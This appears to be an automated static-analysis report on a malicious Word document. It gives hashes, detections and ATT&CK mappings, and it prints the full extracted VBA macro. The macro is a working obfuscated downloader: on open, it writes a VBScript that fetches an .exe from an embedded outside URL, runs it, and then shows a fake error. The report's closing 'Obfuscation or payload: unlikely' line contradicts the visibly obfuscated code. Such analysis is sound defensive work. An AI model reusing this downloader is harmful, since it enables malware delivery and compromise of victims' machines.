Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 4914ce479a8de9cc…

MALICIOUS

Office (OOXML)

201.3 KB Created: 2016-11-01 17:08:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2016-12-24
MD5: 446604d46e0f2b836f9b56bd41a3571f SHA-1: 56bfe011d98538bae3fc46fc1b26097835bc2ead SHA-256: 4914ce479a8de9cc9ff1a7689cfc4fb3a5f84203a6075cd32d333b1f590dc904
250 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains VBA macros, including an AutoOpen subroutine, which is designed to execute automatically when the document is opened. The script contains a call to the Shell function, indicating an attempt to execute a downloaded payload. The document body contains a URL that likely serves as the download location for this payload.

Heuristics 6

  • ClamAV: Doc.Downloader.Valyria-6923204-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Valyria-6923204-0
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Public Sub ljhhdvnwowbk(kaaqnxwqhs)
    Shell kaaqnxwqhs, 1
    End Sub
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
    Public Sub AutoOpen()
    wdweuacsso
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ggjghhfhfh.com/kqaer2c56ds34caq12/file2.exe\ In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 8284 bytes
SHA-256: 3ad3e50a301aa31e31c399e4cc43b47048fcec15671ff51f9164baadbd74295e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Sub AutoOpen()
wdweuacsso
End Sub
Private Sub aquikrxiqpm()
Dim ebnxkaxkwf
Dim fcdrmxxmqo
Dim wtcadlhpsv
Dim wtcadlhpsv, wtcadlhpsv1
Dim onbqdwxlwh
Dim nuihvatwqi
Dim nuihvatwqi, nuihvatwqi1
Dim hfvqkqjiwn
Dim gcpglaavcl
Dim qwhaxukujp
Dim qwhaxukujp, qwhaxukujp1
qwhaxukujp1 = wtcadlhpsv1 + 784
onbqdwxlwh = gcpglaavcl * 354
qwhaxukujp = hfvqkqjiwn + 707
wtcadlhpsv1 = onbqdwxlwh * 13
ebnxkaxkwf = wtcadlhpsv1 + 500
onbqdwxlwh = qwhaxukujp * 163
hfvqkqjiwn = ebnxkaxkwf + 160
ebnxkaxkwf = onbqdwxlwh * 466
onbqdwxlwh = wtcadlhpsv1 + 590
fcdrmxxmqo = qwhaxukujp1 * 935
onbqdwxlwh = fcdrmxxmqo + 907
qwhaxukujp = wtcadlhpsv1 * 812

End Sub '

Public Sub ljhhdvnwowbk(kaaqnxwqhs)
Shell kaaqnxwqhs, 1
End Sub
Private Sub uhehhdgpkb()
Dim tejegfsrmf
Dim bnplsjtddl
Dim tefenkjraf
Dim gotxlaxwbp
Dim pojxbqnira
tejegfsrmf = pojxbqnira + 862
gotxlaxwbp = bnplsjtddl * 330
tejegfsrmf = bnplsjtddl + 946
bnplsjtddl = pojxbqnira * 661
bnplsjtddl = pojxbqnira + 175
bnplsjtddl = tejegfsrmf * 102
gotxlaxwbp = pojxbqnira + 694
bnplsjtddl = tefenkjraf * 368
tejegfsrmf = gotxlaxwbp + 154
tejegfsrmf = pojxbqnira * 744
tejegfsrmf = pojxbqnira + 945
bnplsjtddl = bnplsjtddl * 41
bnplsjtddl = bnplsjtddl + 827
pojxbqnira = tefenkjraf * 525
gotxlaxwbp = pojxbqnira + 38
pojxbqnira = bnplsjtddl * 464
tefenkjraf = tejegfsrmf + 872
tefenkjraf = gotxlaxwbp * 991
tejegfsrmf = tefenkjraf + 186
bnplsjtddl = tejegfsrmf * 442
pojxbqnira = tefenkjraf + 506
gotxlaxwbp = pojxbqnira * 357

End Sub '

Function asmqnukkts() As String
Dim ipfseugqlsqa As Range
    Dim ciovvfnlskk As String, rewkgxrwlb As String
Dim nfsstjdrwse As String
    ciovvfnlskk = pgihatxtkhno("htLHE91tp")
    rewkgxrwlb = pgihatxtkhno("\")
    Set ipfseugqlsqa = ActiveDocument.Content
    ipfseugqlsqa.Find.ClearFormatting
    ipfseugqlsqa.Find.Replacement.ClearFormatting
    With ipfseugqlsqa.Find
        .Text = ciovvfnlskk & "*" & rewkgxrwlb
        .Replacement.Text = ""
        .Forward = True
        .Wrap = wdFindStop
        .Format = False
        .MatchWholeWord = False
        .MatchWildcards = True

        .MatchAllWordForms = False '
    End With

    ipfseugqlsqa.Find.Execute
   nfsstjdrwse = ipfseugqlsqa.Text
     nfsstjdrwse = Left(nfsstjdrwse, Len(nfsstjdrwse) - 2)
nfsstjdrwse = Replace(nfsstjdrwse, Chr(13), "")
   asmqnukkts = Trim(nfsstjdrwse)
    
  
End Function
Private Sub xhgejruxuf()
Dim tpupnurbob
Dim jjmdtwifeg
Dim mxrcvjgbbt
Dim ihnwsjufei
Dim msaktwgcdp
Dim hpuknhdtco
Dim jqjugjtdtn
Dim ljvpxpgxxi
Dim ljvpxpgxxi, ljvpxpgxxi1
Dim pphxtuihor
Dim mfhrgveewc
Dim gtajnrogmo
msaktwgcdp = msaktwgcdp + 670
mxrcvjgbbt = ljvpxpgxxi1 * 536
mxrcvjgbbt = mxrcvjgbbt + 784
msaktwgcdp = msaktwgcdp * 591
ihnwsjufei = ljvpxpgxxi1 + 635
ljvpxpgxxi = jjmdtwifeg * 699
ljvpxpgxxi = ljvpxpgxxi1 + 336
mfhrgveewc = mxrcvjgbbt * 782
msaktwgcdp = gtajnrogmo + 247
ljvpxpgxxi = mfhrgveewc * 247
jjmdtwifeg = ihnwsjufei + 770
gtajnrogmo = ljvpxpgxxi1 * 634
mfhrgveewc = msaktwgcdp + 591
gtajnrogmo = msaktwgcdp * 201
jqjugjtdtn = gtajnrogmo + 165
ihnwsjufei = jjmdtwifeg * 803
pphxtuihor = gtajnrogmo + 762
hpuknhdtco = pphxtuihor * 620
jjmdtwifeg = hpuknhdtco + 996
tpupnurbob = jqjugjtdtn * 588
ihnwsjufei = pphxtuihor + 53
ljvpxpgxxi = pphxtuihor * 464
hpuknhdtco = ljvpxpgxxi + 661
pphxtuihor = ljvpxpgxxi * 377
msaktwgcdp = ljvpxpgxxi1 + 786
hpuknhdtco = hpuknhdtco * 683
jqjugjtdtn = gtajnrogmo + 770
pphxtuihor = ljvpxpgxxi1 * 33
ihnwsjufei = tpupnurbob + 209
gtajnrogmo = hpuknhdtco * 859
hpuknhdtco = mxrcvjgbbt + 146
jqjugjtdtn = pphxtuihor * 219
ljvpxpgxxi1 = pphxtuihor + 118
msaktwgcdp = hpuknhdtco * 96

End Sub '


Function nudeqjcceam()
nudeqjcceam = """"
End Function
Private Sub ecvagpjfrxa()
Dim bosbfsvbua
Dim bosbfsvbua, bosbfsvbua1
Dim uftpmaasaf
Dim sflnjscami
Dim igatfoklkt
Dim ivwcvecnqq
Dim ivwcvecnqq, ivwcvecnqq1
Dim ifcwevvace
Dim jantdgqrvi
igatfoklkt = ivwcvecnqq + 917
igatfoklkt = uftpmaasaf * 157
bosbfsvbua = jantdgqrvi + 496
uftpmaasaf = uftpmaasaf * 369
ivwcvecnqq1 = ivwcvecnqq1 + 314
igatfoklkt = jantdgqrvi * 921
ifcwevvace = jantdgqrvi + 946
ivwcvecnqq1 = jantdgqrvi * 248

End Sub '




Private Sub wdweuacsso()

Dim bfuacreoffv, jcutsgtufd

bfuacreoffv = pgihatxtkhno("LHE91wLHE91aLHE91rLHE91dxsLHE91.LHE91vbs")
Open bfuacreoffv For Output As #2
jcutsgtufd = pgihatxtkhno("e = g(" & nudeqjcceam & "eLHE91rrLHE91or/LHE91*/./*/bLHE91at" & nudeqjcceam & "): SLHE91et aLHE91 = CO(" & nudeqjcceam & "MLHE91/*/LHE91S/*LHE91/X/*LHE91/LHE91M/LHE91*LHE91/LHE91L/*/2/*/.S/*/LHE91er/*/LHE91ve/*/r/*/XMLHE91/*/LHE91LHLHE91/LHE91*/TT/*/P" & nudeqjcceam & "): aLHE91.open g(" & nudeqjcceam & "G/*/ELHE91/LHE91*/T/*/" & nudeqjcceam & "LHE91),LHE91 " & nudeqjcceam)
jcutsgtufd = jcutsgtufd & asmqnukkts
jcutsgtufd = pgihatxtkhno(jcutsgtufd & nudeqjcceam & ", false: aLHE91.send(): LHE91Set bLHE91 = LHE91COLHE91(" & nudeqjcceam & "A/*LHE91/D/*/O/*/D/*/BLHE91/LHE91*LHE91/./*/LHE91S/LHE91*LHE91/t/LHE91*/r/LHE91*/e/*/am" & nudeqjcceam & "): b.Open: LHE91b.TyLHE91pLHE91e = 1LHE91 : b.Write a.ReLHE91sponLHE91seLHE91Body: b.LHE91PoLHE91sitLHE91iLHE91oLHE91n LHE91= 0LHE91 LHE91  :LHE91 LHE91Set c = CO(" & nudeqjcceam & "LHE91S/*/c/*/riptiLHE91ng/*/./*/FLHE91/LHE91*/i/*/LHE91l/*/e/*/LHE91SLHE91/*/y/*LHE91/s/*LHE91/t/*LHE91/e/*/m/*/O/*/LHE91b/*/j/*/e/*/ct" & nudeqjcceam _
& "): If c.FileLHE91exists(eLHE91)LHE91 TheLHE91n c.DLHE91eleteFile e: EnLHE91d If: b.LHE91sLHE91aveToFileLHE91 e: b.Close: DimLHE91 d: SetLHE91 dLHE91 = CLHE91O(" & nudeqjcceam & "W/*/S/LHE91*/c/*/LHE91r/LHE91*/LHE91i/*/LHE91pLHE91/*/t/LHE91*LHE91/./LHE91*/LHE91SLHE91/*/h/LHE91*/e/*LHE91/lLHE91l" & nudeqjcceam & "LHE91): d.RLHE91un(LHE91eLHE91): FuLHE91ncLHE91tionLHE91 coLHE91(NameLHE91) :LHE91 seLHE91t co = CreaLHE91teObject(g(NLHE91ameLHE91)): ELHE91Nd funcLHE91tioLHE91n: FuLHE91nction g(fLHE91): gLHE91 = ReLHE91place(fLHE91," & nudeqjcceam & "/LHE91*/" & nudeqjcceam & "LHE91," & nudeqjcceam & "" & nudeqjcceam & "): end function")
Print #2, jcutsgtufd
Close #2
ljhhdvnwowbk pgihatxtkhno("wLHE91sLHE91criLHE91pt " & nudeqjcceam & bfuacreoffv & nudeqjcceam)
Dim lrnbipiach As String
lrnbipiach = pgihatxtkhno("WiLHE91nLHE91dowLHE91s mxtkbveetl")
Dim ccoxgicxbtjs As String
Dim mxtkbveetl As Integer
ccoxgicxbtjs = pgihatxtkhno("FLHE91ailed lLHE91oaLHE91dinLHE91g doLHE91cuLHE91meLHE91nt")
mxtkbveetl = MsgBox(ccoxgicxbtjs, 16, lrnbipiach)

Application.Quit
End Sub
Private Sub bdpujhujxdos()
Dim rprlsmtesg
rprlsmtesg = rprlsmtesg + 35
rprlsmtesg = rprlsmtesg * 333
rprlsmtesg = rprlsmtesg + 229
rprlsmtesg = rprlsmtesg * 943
rprlsmtesg = rprlsmtesg + 834
rprlsmtesg = rprlsmtesg * 822
rprlsmtesg = rprlsmtesg + 380
rprlsmtesg = rprlsmtesg * 687
rprlsmtesg = rprlsmtesg + 258
rprlsmtesg = rprlsmtesg * 218
rprlsmtesg = rprlsmtesg + 658
rprlsmtesg = rprlsmtesg * 635
rprlsmtesg = rprlsmtesg + 42
rprlsmtesg = rprlsmtesg * 966
rprlsmtesg = rprlsmtesg + 142
rprlsmtesg = rprlsmtesg * 717
rprlsmtesg = rprlsmtesg + 765
rprlsmtesg = rprlsmtesg * 328
rprlsmtesg = rprlsmtesg + 643
rprlsmtesg = rprlsmtesg * 804
rprlsmtesg = rprlsmtesg + 644
rprlsmtesg = rprlsmtesg * 170

End Sub '




Function pgihatxtkhno(s As String) As String
pgihatxtkhno = Replace(s, "LHE91", "")
End Function
Private Sub cwqctslutsr()
Dim tkemuvodvo
Dim tadhurvsth
Dim tadhurvsth, tadhurvsth1
Dim aptmfcdidl
Dim aptmfcdidl, aptmfcdidl1
Dim gatjwfcqme
tkemuvodvo = aptmfcdidl1 + 691
aptmfcdidl1 = tkemuvodvo * 836
aptmfcdidl = aptmfcdidl1 + 432
tkemuvodvo = aptmfcdidl1 * 893
tadhurvsth = tadhurvsth + 815
tadhurvsth = tkemuvodvo * 259
aptmfcdidl1 = tadhurvsth + 619
aptmfcdidl = gatjwfcqme * 91
gatjwfcqme = tadhurvsth + 920
aptmfcdidl = gatjwfcqme * 518
aptmfcdidl1 = aptmfcdidl + 168
tadhurvsth1 = gatjwfcqme * 476
tadhurvsth1 = aptmfcdidl1 + 796
aptmfcdidl1 = gatjwfcqme * 279

End Sub '
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 30208 bytes
SHA-256: 0f4be6ea8351c12893bb183a1bc5c29ea9009d65581d107a2a314e4b44087c2d
Detection
ClamAV: Doc.Downloader.Valyria-6923204-0
Obfuscation or payload: unlikely